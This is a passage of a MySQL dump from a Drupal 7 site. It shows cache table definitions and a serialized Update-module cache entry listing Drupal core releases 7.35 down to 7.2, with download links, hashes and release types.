modules.\";}s:9:\"user-menu\";a:3:{s:9:\"menu_name\";s:9:\"user-menu\";s:5:\"title\";s:9:\"User menu\";s:11:\"description\";s:99:\"The User menu contains links related to the user\'s account, as well as the \'Log out\' link.\";}}',0,1423658754,1); /*!40000 ALTER TABLE `dpl_cache_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_page` -- DROP TABLE IF EXISTS `dpl_cache_page`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_page` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table used to store compressed pages for anonymous...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_page` -- LOCK TABLES `dpl_cache_page` WRITE; /*!40000 ALTER TABLE `dpl_cache_page` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_cache_page` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_path` -- DROP TABLE IF EXISTS `dpl_cache_path`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_path` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for path alias lookup.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_path` -- LOCK TABLES `dpl_cache_path` WRITE; /*!40000 ALTER TABLE `dpl_cache_path` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_cache_path` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_update` -- DROP TABLE IF EXISTS `dpl_cache_update`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_update` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the Update module to store information...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_update` -- LOCK TABLES `dpl_cache_update` WRITE; /*!40000 ALTER TABLE `dpl_cache_update` DISABLE KEYS */; INSERT INTO `dpl_cache_update` VALUES ('available_releases::drupal','a:11:{s:5:\"title\";s:11:\"Drupal core\";s:10:\"short_name\";s:6:\"drupal\";s:4:\"type\";s:12:\"project_core\";s:11:\"api_version\";s:3:\"7.x\";s:17:\"recommended_major\";s:1:\"7\";s:16:\"supported_majors\";s:1:\"7\";s:13:\"default_major\";s:1:\"7\";s:14:\"project_status\";s:9:\"published\";s:4:\"link\";s:37:\"https://www.drupal.org/project/drupal\";s:5:\"terms\";s:15:\"\n \n \n \n \";s:8:\"releases\";a:51:{s:4:\"7.35\";a:13:{s:4:\"name\";s:11:\"drupal 7.35\";s:7:\"version\";s:4:\"7.35\";s:3:\"tag\";s:4:\"7.35\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"35\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.35-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.35.tar.gz\";s:4:\"date\";s:10:\"1426706281\";s:6:\"mdhash\";s:32:\"fecc55bd0bd476bc35d9ebf68452942d\";s:8:\"filesize\";s:7:\"3234349\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.34\";a:13:{s:4:\"name\";s:11:\"drupal 7.34\";s:7:\"version\";s:4:\"7.34\";s:3:\"tag\";s:4:\"7.34\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"34\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.34-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.34.tar.gz\";s:4:\"date\";s:10:\"1416429264\";s:6:\"mdhash\";s:32:\"bb4d212e1eb1d7375e41613fbefa04f2\";s:8:\"filesize\";s:7:\"3229858\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.33\";a:13:{s:4:\"name\";s:11:\"drupal 7.33\";s:7:\"version\";s:4:\"7.33\";s:3:\"tag\";s:4:\"7.33\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"33\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.33-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.33.tar.gz\";s:4:\"date\";s:10:\"1415374080\";s:6:\"mdhash\";s:32:\"187b076a5753960d5d5cb12d30d93e73\";s:8:\"filesize\";s:7:\"3229397\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:4:\"7.32\";a:13:{s:4:\"name\";s:11:\"drupal 7.32\";s:7:\"version\";s:4:\"7.32\";s:3:\"tag\";s:4:\"7.32\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"32\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.32-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.32.tar.gz\";s:4:\"date\";s:10:\"1413387329\";s:6:\"mdhash\";s:32:\"d5d121a6ce974f2d20604a7e10e1987a\";s:8:\"filesize\";s:7:\"3215563\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.31\";a:13:{s:4:\"name\";s:11:\"drupal 7.31\";s:7:\"version\";s:4:\"7.31\";s:3:\"tag\";s:4:\"7.31\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"31\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.31-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.31.tar.gz\";s:4:\"date\";s:10:\"1407346427\";s:6:\"mdhash\";s:32:\"de256f202930d3ef5ccc6aebc550adaf\";s:8:\"filesize\";s:7:\"3216766\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.30\";a:13:{s:4:\"name\";s:11:\"drupal 7.30\";s:7:\"version\";s:4:\"7.30\";s:3:\"tag\";s:4:\"7.30\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"30\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.30-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.30.tar.gz\";s:4:\"date\";s:10:\"1406239728\";s:6:\"mdhash\";s:32:\"ef7bce65ca6395f1e6bc44c15fdbc3cb\";s:8:\"filesize\";s:7:\"3215744\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.29\";a:13:{s:4:\"name\";s:11:\"drupal 7.29\";s:7:\"version\";s:4:\"7.29\";s:3:\"tag\";s:4:\"7.29\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"29\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.29-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.29.tar.gz\";s:4:\"date\";s:10:\"1405543128\";s:6:\"mdhash\";s:32:\"6ffdfb0ee08fadfb531c7fed1d2c5633\";s:8:\"filesize\";s:7:\"3213499\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.28\";a:13:{s:4:\"name\";s:11:\"drupal 7.28\";s:7:\"version\";s:4:\"7.28\";s:3:\"tag\";s:4:\"7.28\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"28\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.28-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.28.tar.gz\";s:4:\"date\";s:10:\"1399522729\";s:6:\"mdhash\";s:32:\"6255884d7e15c654fc8856805b271551\";s:8:\"filesize\";s:7:\"3212823\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.27\";a:13:{s:4:\"name\";s:11:\"drupal 7.27\";s:7:\"version\";s:4:\"7.27\";s:3:\"tag\";s:4:\"7.27\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"27\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.27-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.27.tar.gz\";s:4:\"date\";s:10:\"1397686464\";s:6:\"mdhash\";s:32:\"e9b05562f1a7f8bbcb5922cd3a0d55cb\";s:8:\"filesize\";s:7:\"3207398\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.26\";a:13:{s:4:\"name\";s:11:\"drupal 7.26\";s:7:\"version\";s:4:\"7.26\";s:3:\"tag\";s:4:\"7.26\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"26\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.26-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.26.tar.gz\";s:4:\"date\";s:10:\"1389815904\";s:6:\"mdhash\";s:32:\"740bd57f524b8ac18a203b663ca1329d\";s:8:\"filesize\";s:7:\"3204587\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.25\";a:13:{s:4:\"name\";s:11:\"drupal 7.25\";s:7:\"version\";s:4:\"7.25\";s:3:\"tag\";s:4:\"7.25\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"25\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.25-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.25.tar.gz\";s:4:\"date\";s:10:\"1388709505\";s:6:\"mdhash\";s:32:\"25906158083d89aa86534df1c683b4ea\";s:8:\"filesize\";s:7:\"3203256\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:4:\"7.24\";a:13:{s:4:\"name\";s:11:\"drupal 7.24\";s:7:\"version\";s:4:\"7.24\";s:3:\"tag\";s:4:\"7.24\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"24\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.24-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.24.tar.gz\";s:4:\"date\";s:10:\"1384982905\";s:6:\"mdhash\";s:32:\"c1ddb37155e4b6160f6508636c06f2a7\";s:8:\"filesize\";s:7:\"3195735\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.23\";a:13:{s:4:\"name\";s:11:\"drupal 7.23\";s:7:\"version\";s:4:\"7.23\";s:3:\"tag\";s:4:\"7.23\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"23\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.23-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.23.tar.gz\";s:4:\"date\";s:10:\"1375928239\";s:6:\"mdhash\";s:32:\"0beca6fec15b8cf8c35a6fdda6675342\";s:8:\"filesize\";s:7:\"3191695\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.22\";a:13:{s:4:\"name\";s:11:\"drupal 7.22\";s:7:\"version\";s:4:\"7.22\";s:3:\"tag\";s:4:\"7.22\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"22\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.22-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.22.tar.gz\";s:4:\"date\";s:10:\"1365027013\";s:6:\"mdhash\";s:32:\"068d7a77958fce6bb002659aa7ccaeb7\";s:8:\"filesize\";s:7:\"3183014\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.21\";a:13:{s:4:\"name\";s:11:\"drupal 7.21\";s:7:\"version\";s:4:\"7.21\";s:3:\"tag\";s:4:\"7.21\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"21\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.21-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.21.tar.gz\";s:4:\"date\";s:10:\"1362616997\";s:6:\"mdhash\";s:32:\"eff054cd53be39ff719f77c81dce1aac\";s:8:\"filesize\";s:7:\"3163798\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.20\";a:13:{s:4:\"name\";s:11:\"drupal 7.20\";s:7:\"version\";s:4:\"7.20\";s:3:\"tag\";s:4:\"7.20\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"20\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.20-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.20.tar.gz\";s:4:\"date\";s:10:\"1361393684\";s:6:\"mdhash\";s:32:\"ee576d63f1fd8a1f1c072a56978da0c5\";s:8:\"filesize\";s:7:\"3163257\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.19\";a:13:{s:4:\"name\";s:11:\"drupal 7.19\";s:7:\"version\";s:4:\"7.19\";s:3:\"tag\";s:4:\"7.19\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"19\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.19-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.19.tar.gz\";s:4:\"date\";s:10:\"1358374871\";s:6:\"mdhash\";s:32:\"c1dd3960f1555df208c80ef612e0c53a\";s:8:\"filesize\";s:7:\"3163130\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.18\";a:13:{s:4:\"name\";s:11:\"drupal 7.18\";s:7:\"version\";s:4:\"7.18\";s:3:\"tag\";s:4:\"7.18\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"18\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.18-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.18.tar.gz\";s:4:\"date\";s:10:\"1355944004\";s:6:\"mdhash\";s:32:\"5c048f60a53acd7cb3c2b6d5fe42f082\";s:8:\"filesize\";s:7:\"3162333\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.17\";a:13:{s:4:\"name\";s:11:\"drupal 7.17\";s:7:\"version\";s:4:\"7.17\";s:3:\"tag\";s:4:\"7.17\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"17\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.17-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.17.tar.gz\";s:4:\"date\";s:10:\"1352325358\";s:6:\"mdhash\";s:32:\"439e8ca7e6a33bb879a4624d8f01bed0\";s:8:\"filesize\";s:7:\"3162429\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.16\";a:13:{s:4:\"name\";s:11:\"drupal 7.16\";s:7:\"version\";s:4:\"7.16\";s:3:\"tag\";s:4:\"7.16\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"16\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1815904\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.16.tar.gz\";s:4:\"date\";s:10:\"1350508568\";s:6:\"mdhash\";s:32:\"352497b2df94b5308e31cb8da020b631\";s:8:\"filesize\";s:7:\"3142889\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.15\";a:13:{s:4:\"name\";s:11:\"drupal 7.15\";s:7:\"version\";s:4:\"7.15\";s:3:\"tag\";s:4:\"7.15\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"15\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1708292\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.15.tar.gz\";s:4:\"date\";s:10:\"1343839327\";s:6:\"mdhash\";s:32:\"f42c9baccd74e1d035d61ff537ae21b4\";s:8:\"filesize\";s:7:\"3142219\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.14\";a:13:{s:4:\"name\";s:11:\"drupal 7.14\";s:7:\"version\";s:4:\"7.14\";s:3:\"tag\";s:4:\"7.14\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"14\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1558424\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.14.tar.gz\";s:4:\"date\";s:10:\"1335997556\";s:6:\"mdhash\";s:32:\"af7abd95c03ecad4e1567ed94a438334\";s:8:\"filesize\";s:7:\"3128473\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.13\";a:13:{s:4:\"name\";s:11:\"drupal 7.13\";s:7:\"version\";s:4:\"7.13\";s:3:\"tag\";s:4:\"7.13\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"13\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1558412\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.13.tar.gz\";s:4:\"date\";s:10:\"1335997261\";s:6:\"mdhash\";s:32:\"80587b66375c7fc539414a20a2c6f2de\";s:8:\"filesize\";s:7:\"3088448\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.12\";a:13:{s:4:\"name\";s:11:\"drupal 7.12\";s:7:\"version\";s:4:\"7.12\";s:3:\"tag\";s:4:\"7.12\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"12\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1425104\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.12.tar.gz\";s:4:\"date\";s:10:\"1328134561\";s:6:\"mdhash\";s:32:\"db2284beb97241c9bdca9c638cd8a4f1\";s:8:\"filesize\";s:7:\"3088472\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:4:\"7.11\";a:13:{s:4:\"name\";s:11:\"drupal 7.11\";s:7:\"version\";s:4:\"7.11\";s:3:\"tag\";s:4:\"7.11\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"11\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1425092\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.11.tar.gz\";s:4:\"date\";s:10:\"1328134275\";s:6:\"mdhash\";s:32:\"e9857e1749762367d7631d74cc6564a7\";s:8:\"filesize\";s:7:\"2789336\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.10\";a:13:{s:4:\"name\";s:11:\"drupal 7.10\";s:7:\"version\";s:4:\"7.10\";s:3:\"tag\";s:4:\"7.10\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"10\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1361968\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.10.tar.gz\";s:4:\"date\";s:10:\"1323125439\";s:6:\"mdhash\";s:32:\"1caafb849bc756e62dd874b90b95ab31\";s:8:\"filesize\";s:7:\"3067653\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:3:\"7.9\";a:13:{s:4:\"name\";s:10:\"drupal 7.9\";s:7:\"version\";s:3:\"7.9\";s:3:\"tag\";s:3:\"7.9\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"9\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1322736\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.9.tar.gz\";s:4:\"date\";s:10:\"1319660731\";s:6:\"mdhash\";s:32:\"7f45f109c413ca69ebb6e3140ed47225\";s:8:\"filesize\";s:7:\"2788086\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:3:\"7.8\";a:13:{s:4:\"name\";s:10:\"drupal 7.8\";s:7:\"version\";s:3:\"7.8\";s:3:\"tag\";s:3:\"7.8\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"8\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1265840\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.8.tar.gz\";s:4:\"date\";s:10:\"1314817617\";s:6:\"mdhash\";s:32:\"e0226b56e8d5c57c6b126e8ed5866b1f\";s:8:\"filesize\";s:7:\"2766967\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.7\";a:13:{s:4:\"name\";s:10:\"drupal 7.7\";s:7:\"version\";s:3:\"7.7\";s:3:\"tag\";s:3:\"7.7\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"7\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1231826\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.7.tar.gz\";s:4:\"date\";s:10:\"1311813880\";s:6:\"mdhash\";s:32:\"2eeb63fd1ef6b23b0a9f5f6b8aef8850\";s:8:\"filesize\";s:7:\"2754113\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.6\";a:13:{s:4:\"name\";s:10:\"drupal 7.6\";s:7:\"version\";s:3:\"7.6\";s:3:\"tag\";s:3:\"7.6\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"6\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1231586\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.6.tar.gz\";s:4:\"date\";s:10:\"1311798716\";s:6:\"mdhash\";s:32:\"e88e63c4da9e5e170f089d050c88c827\";s:8:\"filesize\";s:7:\"2753784\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.5\";a:13:{s:4:\"name\";s:10:\"drupal 7.5\";s:7:\"version\";s:3:\"7.5\";s:3:\"tag\";s:3:\"7.5\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"5\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1231582\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.5.tar.gz\";s:4:\"date\";s:10:\"1311798416\";s:6:\"mdhash\";s:32:\"36d65b7a97c58226c64a6abdf481de45\";s:8:\"filesize\";s:7:\"2744690\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:3:\"7.4\";a:13:{s:4:\"name\";s:10:\"drupal 7.4\";s:7:\"version\";s:3:\"7.4\";s:3:\"tag\";s:3:\"7.4\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"4\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1204634\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.4.tar.gz\";s:4:\"date\";s:10:\"1309397516\";s:6:\"mdhash\";s:32:\"84704de078e9f5432c9bb5c6ecd841d4\";s:8:\"filesize\";s:7:\"2744808\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.3\";a:13:{s:4:\"name\";s:10:\"drupal 7.3\";s:7:\"version\";s:3:\"7.3\";s:3:\"tag\";s:3:\"7.3\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1204628\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.3.tar.gz\";s:4:\"date\";s:10:\"1309397216\";s:6:\"mdhash\";s:32:\"c290775724bc309647d84d03ddb88e2e\";s:8:\"filesize\";s:7:\"2735461\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:3:\"7.2\";a:13:{s:4:\"name\";s:10:\"drupal 